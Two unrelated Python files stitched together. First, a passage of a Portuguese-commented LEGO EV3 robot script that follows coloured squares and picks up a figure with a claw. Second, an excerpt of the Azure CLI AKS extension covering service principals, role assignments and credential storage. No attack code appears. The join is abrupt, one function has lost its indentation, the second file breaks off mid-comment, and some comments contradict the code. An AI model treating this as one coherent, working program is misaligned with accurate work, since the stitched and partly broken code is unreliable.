cor_atual = ""                         # colour of the last confirmed square
tentativa = 0                          # failed attempts at the current square
c = ""                                 # latest colour classification (updated by cor_th thread)
mochila = False                        # True while a passenger is being carried
velocidade = 20                        # base drive speed (percent)
# FIX: load the calibrated colour table through a context manager so the
# file handle is closed (it previously leaked an open file object).
with open("Cores.p", "rb") as _cores_file:
    cores = pickle.load(_cores_file)
Sensor_direita = ColorSensor(INPUT_2)
Sensor_esquerda = ColorSensor(INPUT_4)
Sensor_direita.mode = Sensor_direita.MODE_RGB_RAW
Sensor_esquerda.mode = Sensor_esquerda.MODE_RGB_RAW
Sensor_sonic = UltrasonicSensor(INPUT_3)
Sensor_sonic.mode = Sensor_sonic.MODE_US_DIST_CM
print("Declarando tudo!", end=' \r')
#FUNÇÔES DE LOCOMOÇÂO
def retorno():
    """Drive back to the last confirmed square after hitting the end of the
    track (Black), then try the next unexplored direction."""
    global tentativa, c, cor_atual, velocidade
    while c != cor_atual:
        rodas.on(SpeedPercent(velocidade), SpeedPercent(velocidade))
        if c != 'White': Confirmar_cor(c)
    # Extra push so the robot stops in the middle of the square.
    rodas.on_for_seconds(SpeedPercent(velocidade), SpeedPercent(velocidade), 8/SpeedPercent(velocidade))
    rodas.off()
    tentativa += 1  # record that one attempt has failed
    procurar_proximo()  # turn according to the directions still possible
    # Move slightly forward so the robot does not re-detect the same
    # reference point as a new one.
    alinha(0.02, 230, 30)
def alinha(Kp, target, margem):
    """Proportional alignment: square the robot up on the edge of a colour
    patch using both colour sensors; each sensor's RGB-sum is driven toward
    *target* (within +/-*margem*) with proportional gain *Kp*."""
    global d
    erroE = 1
    erroD = 1
    # First move onto (or off) the patch so both sensors sit near the edge.
    if c == 'White':
        while c == 'White':
            rodas.on(15, 15)
        rodas.off()
    else:
        while c != 'White':
            rodas.on(-15, -15)
        rodas.off()
    while (erroE != 0 or erroD != 0):
        # Right sensor error (raw RGB from the cor_th background thread).
        atualD = d[0]+d[1]+d[2]
        erroD = atualD - target
        if abs(erroD) < margem:
            erroD = 0
        outputD = erroD * (Kp+0.01)  # right wheel gets a slightly higher gain
        atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
        erroE = atualE - target
        if abs(erroE) < margem:
            erroE = 0
        outputE = erroE * Kp
        # Clamp motor outputs to the +/-40 range.
        if outputE > 40:
            outputE = 40
        elif outputE < -40:
            outputE = -40
        if outputD > 40:
            outputD = 40
        if erroE == 0 and erroD == 0:
            rodas.off()
        else:
            rodas.on(outputE, outputD)
    # Back off the patch so the caller starts again from white.
    while c != 'White':
        rodas.on(-20, -20)
    time.sleep(0.3)
    rodas.off()
def andar_frente():
    """Main forward step: drive until a colour square or the track end
    (Black) is found, record/learn the square, and line up for the next move.

    NOTE(review): all timings here were tuned on a test track and should be
    re-calibrated for the final robot and track.
    """
    global cor_atual, tentativa, quads, c, plaza, memoria_cor
    # Drive forward until Black is seen; return the elapsed behaviour to caller.
    while 1:
        if (c == "Black"):
            rodas.off()
            retorno()
            return
        elif c != "White" and c != "Black":
            if (Confirmar_cor(c)):
                verificar_plaza()
                if (len(quads) > 0 and plaza == False): memoria_cor[cor_atual] = orientacao
                if (plaza == False): quads.append(c)
                cor_atual = c
                print('ACHEI: ', cor_atual)
                tentativa = 0
                rodas.off()
                procurar_proximo()
                alinha(0.02, 230, 30)
                return
        while c == 'White':
            # On white: look for the passenger if the claw is empty
            # (mochila == 0); otherwise just keep driving forward.
            procurar_passageiro()
def virar(graus):
    """Turn in place by *graus* degrees relative to the current heading
    (positive = right, negative = left, 0 = no turn)."""
    if graus == 0:
        return
    # 0.666 wheel rotations correspond to a 90-degree pivot.
    rotacoes = abs(graus) * (0.666 / 90)
    if graus < 0:
        rodas.on_for_rotations(-40, 40, rotacoes)
    else:
        rodas.on_for_rotations(40, -40, rotacoes)
def procurar_proximo():
    """Pick the next direction from the current square: follow the learned
    direction if this colour is already known, otherwise try right (90),
    then straight (0), then left (-90), skipping directions already mapped
    to other squares."""
    global tentativa, cor_atual, orientacao
    if (cor_atual not in memoria_cor.keys()):
        if (90 not in memoria_cor.values() and tentativa == 0):
            virar(90)
            orientacao = 90
        if (90 in memoria_cor.values()):
            tentativa = 1
        if (0 not in memoria_cor.values() and tentativa == 1):
            virar(-90)
            orientacao = 0
        if (0 in memoria_cor.values() and tentativa == 1):
            tentativa = 2
        # if(90 not in memoria_cor.values()):
        #     virar(-90)
        if (-90 not in memoria_cor.values() and tentativa == 2):
            # Need a full half-turn when we skipped the right direction.
            if (90 not in memoria_cor.values() and 0 in memoria_cor.values()):
                virar(-90)
                virar(-90)
            else: virar(-90)
            orientacao = -90
    else: virar(memoria_cor[cor_atual])
#FIM DAS FUNÇÔES DE LOCOMOÇÂO
#FUNÇÕES DE COR
def media(leitura1, leitura2):
    """Return the channel-wise average of two 3-channel sensor readings
    as a tuple (R, G, B)."""
    return tuple((leitura1[canal] + leitura2[canal]) / 2 for canal in range(3))
def cor_mais_proxima(leitura):
    """Return the name of the calibrated colour nearest to *leitura*
    (raw RGB triple) by Euclidean distance.

    Fixes vs the original: no shadowing of the builtin `min`, no O(n^2)
    reverse lookup of the colour name, and no possibly-unbound result
    variable (returns None for an empty calibration table instead of
    raising NameError).
    """
    global cores
    melhor_nome = None
    melhor_dist = 1000  # same sentinel as the original implementation
    for nome, valor in cores.items():
        # Euclidean distance between the sensor reading and the calibrated value.
        dist = sqrt(((leitura[0]-valor[0])**2) +
                    ((leitura[1]-valor[1])**2)+((leitura[2]-valor[2])**2))
        if dist < melhor_dist:
            melhor_dist = dist
            melhor_nome = nome
    return melhor_nome
def diferente_de(*cor):
    """Return 1 if the current colour reading `c` is not among *cor*, else 0."""
    global c
    return 0 if c in cor else 1
def cor_th():
    """Background thread body: continuously classify the right colour sensor
    into global `c` and keep its raw RGB reading in global `d`."""
    global c, d
    while(1):
        c = cor_mais_proxima(Sensor_direita.rgb)
        d = Sensor_direita.rgb
        # if(c=='Black' and plaza ==False):rodas.off()
def Confirmar_cor(cor_vista):
    """Debounce a colour reading: wait 0.1 s and return True only if the
    background thread still reports *cor_vista*."""
    global c
    time.sleep(0.1)
    return c == cor_vista
#FIM DAS FUNÇÕES DE COR
#FUNÇÕES DO PLAZA
def verificar_plaza():
    """Back up briefly while watching the colour sensor; if more than one
    colour change is seen we are on the plaza (multi-coloured area): drop the
    passenger there, retrace, and start the return run (Volta)."""
    global c, mochila, quad, cor_atual, plaza, velocidade
    if (1):
        if c != 'Black':
            mudanca = 0
            cor_momento = c
            # Reverse for a fixed time on a helper thread so colours can be
            # monitored concurrently.
            goiaba = Thread(target=rodas.on_for_seconds, args=(-15, -15, 32.22/15,))
            goiaba.start()
            while (goiaba.is_alive()):
                print("Checando plaza: ", mudanca)
                if (cor_momento != c):
                    mudanca += 1
                    cor_momento = c
                if (mudanca >= 2):
                    print("PLAZA")
                    # Persist the learned directions for later debugging.
                    # NOTE(review): the file handle passed to pickle.dump is
                    # never closed — confirm and fix on the robot.
                    pickle.dump(memoria_cor, open('memoria.p', 'wb'))
                    plaza = True  # plaza found
                    quads.append(quad(cor_atual))  # record the last square before the plaza
                    tempo = time.time()
                    while (c != 'Black'):
                        rodas.on(-(SpeedPercent(velocidade)*1.35), -(SpeedPercent(velocidade)*1.35))
                        if (diferente_de('Black', 'White')):
                            if (Confirmar_cor(c)):
                                rodas.off()
                                return
                    if (plaza == True):
                        rodas.off()
                        time.sleep(49.5/SpeedPercent(velocidade))
                        par = mochila
                        solte()  # drop the passenger
                        mochila = False
                        # Retrace the same amount of time spent driving in.
                        rodas.on_for_seconds((SpeedPercent(velocidade)*1.35), (SpeedPercent(velocidade)*1.35), time.time()-tempo)
                        while (c == "White"): rodas.on(SpeedPercent(velocidade), SpeedPercent(velocidade))
                        rodas.on_for_seconds(SpeedPercent(velocidade), SpeedPercent(velocidade), 8/SpeedPercent(velocidade))
                        rodas.off()
                        if par == True: Mochila_sobe()
                        virar(180)
                        Volta()
                    else: pass
            goiaba.join()
            rodas.off()
def Volta():
    """Return run: retrace the coloured squares using the learned directions
    while looking for the passenger; turn back toward the plaza once the
    passenger is picked up or the last square is reached."""
    global quads, mochila, start_time, c, velocidade
    i = 4  # go only as far as the last square - 1
    # Set i to the number of coloured squares on the track.
    while (i > 0 and mochila == False):  # drop the mochila condition to always reach the last square
        if c != 'White':
            print(memoria_cor[c])
            # Undo the turn that was learned on the way out.
            virar((memoria_cor[c])*(-1))
            alinha(0.02, 230, 30)
        procurar_passageiro()
        time.sleep(35.22/SpeedPercent(velocidade))
        rodas.off()
        if (mochila == True):
            # Passenger found: turn around and head back toward the plaza.
            virar(90)
            virar(90)
            alinha(0.02, 230, 30)
            while (c != 'White'): rodas.on(-SpeedPercent(velocidade), -SpeedPercent(velocidade))
            rodas.off()
            return
        i -= 1
        # If the sensor detects something, restart timing and run the pick-up routine.
        if (i == 0):
            virar(90)
            virar(90)
            while (c != 'White'): rodas.on(-SpeedPercent(velocidade), -SpeedPercent(velocidade))
            rodas.off()
            procurar_passageiro()
            verificar_plaza()
#FIM DAS FUNÇÕES DO PLAZA
#FUNÇÕES DA MOCHILA(EQUIPAMENTO DE CAPTURAR BONECO)
def procurar_passageiro():
    """Drive backwards over white while watching the ultrasonic sensor; pick
    up a passenger when one is closer than 15 cm and the claw is empty."""
    global mochila, c, velocidade
    while c == 'White':
        rodas.on(-SpeedPercent(velocidade), -SpeedPercent(velocidade))
        if Sensor_sonic.distance_centimeters < 15 and mochila == 0:
            rodas.off()
            pega()
def Mochila_desce():
    # Lower the claw (negative rotations raise it).
    Mochila.on_for_rotations(SpeedPercent(20), 0.53)
def Mochila_solta():
    # Open the claw to release the passenger.
    Mochila.on_for_rotations(SpeedPercent(20), 0.25)
def Mochila_pega():
    # Close the claw around the passenger.
    Mochila.on_for_rotations(SpeedPercent(-20), 0.25)
def Mochila_sobe():
    # Raise the claw back to travel position.
    Mochila.on_for_rotations(SpeedPercent(-20), 0.53)
def solte():
    """Stop the wheels and release the passenger if one is being carried."""
    global mochila
    rodas.off()
    if (mochila == True):
        Mochila_solta()
def pega():
    """Pick up the passenger detected by the ultrasonic sensor: lower the
    claw, approach, grab, then return to the original spot and heading."""
    global mochila
    dist = Sensor_sonic.distance_centimeters
    time.sleep(0.5)
    rodas.off()
    Mochila_desce()
    virar(90)
    time.sleep(1)
    # Drive toward the figure; 0.05 converts cm to seconds — tune so the
    # robot actually reaches the figure on the real track.
    rodas.on_for_seconds(-20, -20, dist*0.05)
    Mochila_pega()
    time.sleep(1)
    mochila = True
    rodas.on_for_seconds(20, 20, dist*0.05)
    virar(-90)
    rodas.off()
#FIM DAS FUNÇÕES DE MOCHILA
#FUNÇÕES DE INFORMAÇÃO
class quad:
    """Record of a reference point (coloured square) found on the track."""

    def __init__(self, cor):
        self.cor = cor  # the square's colour name
#FIM DAS FUNÇÕES DE INFORMAÇÃO
print("Vamos comecar!", end=' \r')
if __name__=="__main__":
    start_time = 0
    plaza = False
    # Colour-polling daemon thread keeps globals `c`/`d` updated in the background.
    ver_cor = Thread(target=cor_th)
    ver_cor.daemon = True
    ver_cor.start()
    time.sleep(0.5)
    Mochila_sobe()
    # Main loop: keep stepping forward until a figure is found or the track ends.
    while (1):
        andar_frente()
|
custom.py | # pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
import zipfile
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import ManualInterrupt, InvalidArgumentValueError, UnclassifiedUserFault, CLIInternalError, FileOperationError, ClientRequestError, DeploymentError, ValidationError, ArgumentUsageError, MutuallyExclusiveArgumentError, RequiredArgumentMissingError, ResourceNotFoundError
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import get_file_json, in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core._profile import Profile
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2021_07_01.models import (ContainerServiceLinuxProfile,
ManagedClusterWindowsProfile,
ContainerServiceNetworkProfile,
ManagedClusterServicePrincipalProfile,
ContainerServiceSshConfiguration,
ContainerServiceSshPublicKey,
ManagedCluster,
ManagedClusterAADProfile,
ManagedClusterAddonProfile,
ManagedClusterAgentPoolProfile,
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
ManagedClusterIdentity,
ManagedClusterAPIServerAccessProfile,
ManagedClusterSKU,
ManagedServiceIdentityUserAssignedIdentitiesValue,
ManagedClusterAutoUpgradeProfile,
KubeletConfig,
LinuxOSConfig,
ManagedClusterHTTPProxyConfig,
SysctlConfig,
ManagedClusterPodIdentityProfile,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
UserAssignedIdentity)
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import get_msi_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._client_factory import cf_agent_pools
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type,
_set_outbound_type, _parse_comma_separated_list,
_trim_fqdn_name_containing_hcp)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_MONITORING_USING_AAD_MSI_AUTH
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import CONST_OPEN_SERVICE_MESH_ADDON_NAME
from ._consts import CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME, CONST_SECRET_ROTATION_ENABLED
from ._consts import CONST_MANAGED_IDENTITY_OPERATOR_ROLE, CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID
from ._consts import ADDONS
from .maintenanceconfiguration import aks_maintenanceconfiguration_update_internal
from ._consts import CONST_PRIVATE_DNS_ZONE_SYSTEM, CONST_PRIVATE_DNS_ZONE_NONE
logger = get_logger(__name__)
def which(binary):
    """Return the full path of *binary* found on the PATH, or None.

    On Windows an '.exe' suffix is appended and ';' is used as the PATH
    separator; elsewhere ':' is used. Only existing, regular, executable
    files are returned.
    """
    # Fix: os.getenv('PATH') may return None (unset env), which crashed on .split()
    path_var = os.getenv('PATH') or ''
    if platform.system() == 'Windows':
        binary = binary + '.exe'
        parts = path_var.split(';')
    else:
        parts = path_var.split(':')
    for part in parts:
        bin_path = os.path.join(part, binary)
        if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
            return bin_path
    return None
def wait_then_open(url):
    """
    Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.

    Probes *url* up to 9 times, sleeping 1s after each failed attempt, then
    opens a browser tab regardless of whether the probe ever succeeded.
    """
    for _ in range(1, 10):
        try:
            urlopen(url, context=_ssl_context())
        except URLError:
            time.sleep(1)
        else:
            # Fix: 'break' was previously at loop level, so the loop always
            # exited after the first attempt and never actually retried.
            break
    webbrowser.open_new_tab(url)
def wait_then_open_async(url):
    """
    Spawns a daemon thread that waits for a bit then opens a URL.
    """
    # Fix: args must be a tuple; '({url})' is a set literal, which only worked
    # by accidental single-element unpacking and fails for unhashable values.
    t = threading.Thread(target=wait_then_open, args=(url,))
    t.daemon = True
    t.start()
def _ssl_context():
    """Return an SSL context for urlopen, degrading gracefully on old runtimes."""
    needs_legacy = sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows')
    if not needs_legacy:
        return ssl.create_default_context()
    try:
        # ssl.PROTOCOL_TLS was added in python 2.7.13 and 3.6
        return ssl.SSLContext(ssl.PROTOCOL_TLS)
    except AttributeError:
        return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
    """Create an AAD application and its service principal; return the app id.

    Service principal creation is retried up to 10 times with growing delays
    (AAD propagation can lag). Returns False when every attempt fails.
    """
    # use get_progress_controller
    hook = cli_ctx.get_progress_controller(True)
    # Fix: kwarg was misspelled 'messsage', so the initial progress message
    # was silently dropped / never displayed.
    hook.add(message='Creating service principal', value=0, total_val=1.0)
    logger.info('Creating service principal')
    # always create application with 5 years expiration
    start_date = datetime.datetime.utcnow()
    end_date = start_date + relativedelta(years=5)
    result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
                                start_date=start_date, end_date=end_date)
    service_principal = result.app_id  # pylint: disable=no-member
    for x in range(0, 10):
        hook.add(message='Creating service principal',
                 value=0.1 * x, total_val=1.0)
        try:
            create_service_principal(
                cli_ctx, service_principal, rbac_client=rbac_client)
            break
        # TODO figure out what exception AAD throws here sometimes.
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            time.sleep(2 + 2 * x)
    else:
        # loop exhausted without a successful creation
        return False
    hook.add(message='Finished service principal creation',
             value=1.0, total_val=1.0)
    logger.info('Finished service principal creation')
    return service_principal
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
    """Create a role assignment, retrying while AAD data propagates.

    Retries up to 10 times with linearly growing sleeps. Returns True on
    success (an already-existing assignment counts as success), False if
    every attempt failed.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to propagate',
             value=0, total_val=1.0)
    logger.info('Waiting for AAD role to propagate')
    for x in range(0, 10):
        hook.add(message='Waiting for AAD role to propagate',
                 value=0.1 * x, total_val=1.0)
        try:
            # TODO: break this out into a shared utility library
            create_role_assignment(
                cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
            break
        except CloudError as ex:
            # treat an already-existing assignment as success
            if ex.message == 'The role assignment already exists.':
                break
            logger.info(ex.message)
        except:  # pylint: disable=bare-except
            pass
        time.sleep(delay + delay * x)
    else:
        # loop exhausted without a break -> assignment never succeeded
        return False
    hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
    logger.info('AAD role propagation done')
    return True
# NOTE(review): an identical definition of this function appears again later
# in this file; the later one shadows this one at import time.
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
    """Delete role assignments for *service_principal*, retrying on CloudError.

    Retries up to 10 times with linearly growing sleeps; CLIError is
    re-raised immediately. Returns True on success, False when all
    attempts failed.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
    logger.info('Waiting for AAD role to delete')
    for x in range(0, 10):
        hook.add(message='Waiting for AAD role to delete',
                 value=0.1 * x, total_val=1.0)
        try:
            delete_role_assignments(cli_ctx,
                                    role=role,
                                    assignee=service_principal,
                                    scope=scope)
            break
        except CLIError as ex:
            raise ex
        except CloudError as ex:
            logger.info(ex)
            time.sleep(delay + delay * x)
    else:
        # loop exhausted without a break -> deletion never succeeded
        return False
    hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
    logger.info('AAD role deletion done')
    return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
                                file_name='acsServicePrincipal.json'):
    """Persist service principal credentials for *subscription_id* in the CLI config dir."""
    entry = {}
    if client_secret:
        entry['client_secret'] = client_secret
    if service_principal:
        entry['service_principal'] = service_principal
    config_path = os.path.join(get_config_dir(), file_name)
    all_principals = load_service_principals(config_path=config_path) or {}
    all_principals[subscription_id] = entry
    # 0o600: the file holds secrets, so restrict it to owner read/write
    fd = os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, 'w+') as sp_file:
        json.dump(all_principals, sp_file)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
    """Return the stored service principal entry for *subscription_id*, or None."""
    store = load_service_principals(os.path.join(get_config_dir(), file_name))
    return store.get(subscription_id) if store else None
def load_service_principals(config_path):
    """Parse the credential store at *config_path*; None when missing or unreadable."""
    if not os.path.exists(config_path):
        return None
    fd = os.open(config_path, os.O_RDONLY)
    try:
        with os.fdopen(fd) as handle:
            return shell_safe_json_parse(handle.read())
    except:  # pylint: disable=bare-except
        # best-effort read: any parse/IO failure is treated as "no store"
        return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
                       subscription_id=None):
    """Validate or create an ARM deployment (mode 'incremental').

    When *validate* is true the template is logged and only validated
    (using the new begin_validate poller when the API version allows);
    otherwise the deployment is created, honoring *no_wait*.
    """
    from azure.cli.core.profiles import ResourceType
    DeploymentProperties = cmd.get_models(
        'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
    properties = DeploymentProperties(
        template=template, parameters=parameters, mode='incremental')
    smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
                                  subscription_id=subscription_id).deployments
    if validate:
        # dump the full template to the log for troubleshooting
        logger.info('==== BEGIN TEMPLATE ====')
        logger.info(json.dumps(template, indent=2))
        logger.info('==== END TEMPLATE ====')
    Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
    deployment = Deployment(properties=properties)
    if validate:
        if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
            validation_poller = smc.begin_validate(resource_group_name, deployment_name, deployment)
            return LongRunningOperation(cmd.cli_ctx)(validation_poller)
        else:
            return smc.validate(resource_group_name, deployment_name, deployment)
    return sdk_no_wait(no_wait, smc.begin_create_or_update, resource_group_name, deployment_name, deployment)
def create_application(client, display_name, homepage, identifier_uris,
                       available_to_other_tenants=False, password=None, reply_urls=None,
                       key_value=None, key_type=None, key_usage=None, start_date=None,
                       end_date=None):
    """Create an AAD application via the graph RBAC *client*.

    Credentials are built by _build_application_creds (password XOR key_value).
    Raises CLIError with configuration guidance when the caller lacks
    directory permissions; other graph errors are re-raised unchanged.
    """
    from azure.graphrbac.models import GraphErrorException
    password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
                                                         key_usage=key_usage, start_date=start_date, end_date=end_date)
    app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
                                                   display_name=display_name,
                                                   identifier_uris=identifier_uris,
                                                   homepage=homepage,
                                                   reply_urls=reply_urls,
                                                   key_credentials=key_creds,
                                                   password_credentials=password_creds)
    try:
        return client.create(app_create_param)
    except GraphErrorException as ex:
        if 'insufficient privileges' in str(ex).lower():
            link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal'  # pylint: disable=line-too-long
            raise CLIError("Directory permission is needed for the current user to register the application. "
                           "For how to configure, please refer '{}'. Original error: {}".format(link, ex))
        raise
def _build_application_creds(password=None, key_value=None, key_type=None,
                             key_usage=None, start_date=None, end_date=None):
    """Return (password_credentials, key_credentials) for an AAD application.

    Exactly one of *password* / *key_value* may be supplied; string dates are
    parsed, missing dates default to now / now+1 year.
    """
    if password and key_value:
        raise CLIError(
            'specify either --password or --key-value, but not both.')
    if not start_date:
        start_date = datetime.datetime.utcnow()
    elif isinstance(start_date, str):
        start_date = parse(start_date)
    if not end_date:
        end_date = start_date + relativedelta(years=1)
    elif isinstance(end_date, str):
        end_date = parse(end_date)
    key_type = key_type or 'AsymmetricX509Cert'
    key_usage = key_usage or 'Verify'
    password_creds = None
    key_creds = None
    if password:
        password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
                                             key_id=str(uuid.uuid4()), value=password)]
    elif key_value:
        key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
                                   key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
    return password_creds, key_creds
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
    """Create a service principal for an application.

    *identifier* may be an appId GUID, an identifier URI, or an object id;
    when *resolve_app* is true it is first resolved to the application's
    appId via the graph client.
    """
    if rbac_client is None:
        rbac_client = get_graph_rbac_management_client(cli_ctx)
    if resolve_app:
        try:
            # a GUID identifier is looked up as the appId ...
            uuid.UUID(identifier)
            result = list(rbac_client.applications.list(
                filter="appId eq '{}'".format(identifier)))
        except ValueError:
            # ... anything else is looked up as an identifier URI
            result = list(rbac_client.applications.list(
                filter="identifierUris/any(s:s eq '{}')".format(identifier)))
        if not result:  # assume we get an object id
            result = [rbac_client.applications.get(identifier)]
        app_id = result[0].app_id
    else:
        app_id = identifier
    return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
    """Create a role assignment; the assignee is resolved only for service principals."""
    return _create_role_assignment(
        cli_ctx, role, assignee,
        resource_group_name=resource_group_name,
        scope=scope,
        resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
                            resource_group_name=None, scope=None, resolve_assignee=True):
    """Create a role assignment at the computed scope.

    *role* may be a name or a role-definition GUID; *assignee* is resolved to
    an AAD object id only when *resolve_assignee* is true (i.e. for service
    principals — MSI callers already pass an object id).
    """
    from azure.cli.core.profiles import ResourceType, get_sdk
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    definitions_client = factory.role_definitions
    scope = _build_role_scope(
        resource_group_name, scope, assignments_client.config.subscription_id)
    # XXX: if role is uuid, this function's output cannot be used as role assignment defintion id
    # ref: https://github.com/Azure/azure-cli/issues/2458
    role_id = _resolve_role_id(role, scope, definitions_client)
    # If the cluster has service principal resolve the service principal client id to get the object id,
    # if not use MSI object id.
    object_id = _resolve_object_id(
        cli_ctx, assignee) if resolve_assignee else assignee
    RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
                                             'RoleAssignmentCreateParameters', mod='models',
                                             operation_group='role_assignments')
    parameters = RoleAssignmentCreateParameters(
        role_definition_id=role_id, principal_id=object_id)
    # assignment names are arbitrary; a fresh GUID avoids collisions
    assignment_name = uuid.uuid4()
    custom_headers = None
    return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
                            scope=None, include_inherited=False, yes=None):
    """Delete role assignments by explicit *ids*, or by assignee/role/scope filters.

    When no filter at all is supplied, asks for confirmation before deleting
    every assignment under the subscription (skipped when *yes* is truthy).
    """
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    definitions_client = factory.role_definitions
    ids = ids or []
    if ids:
        if assignee or role or resource_group_name or scope or include_inherited:
            raise CLIError(
                'When assignment ids are used, other parameter values are not required')
        for i in ids:
            assignments_client.delete_by_id(i)
        return
    # Fix: 'assignee' was listed twice in this guard; deduplicated (no behavior change)
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
        from knack.prompting import prompt_y_n
        msg = 'This will delete all role assignments under the subscription. Are you sure?'
        if not prompt_y_n(msg, default="n"):
            return
    scope = _build_role_scope(resource_group_name, scope,
                              assignments_client.config.subscription_id)
    assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                                           scope, assignee, role, include_inherited,
                                           include_groups=False)
    if assignments:
        for a in assignments:
            assignments_client.delete_by_id(a.id)
# NOTE(review): this is a byte-for-byte duplicate of _delete_role_assignments
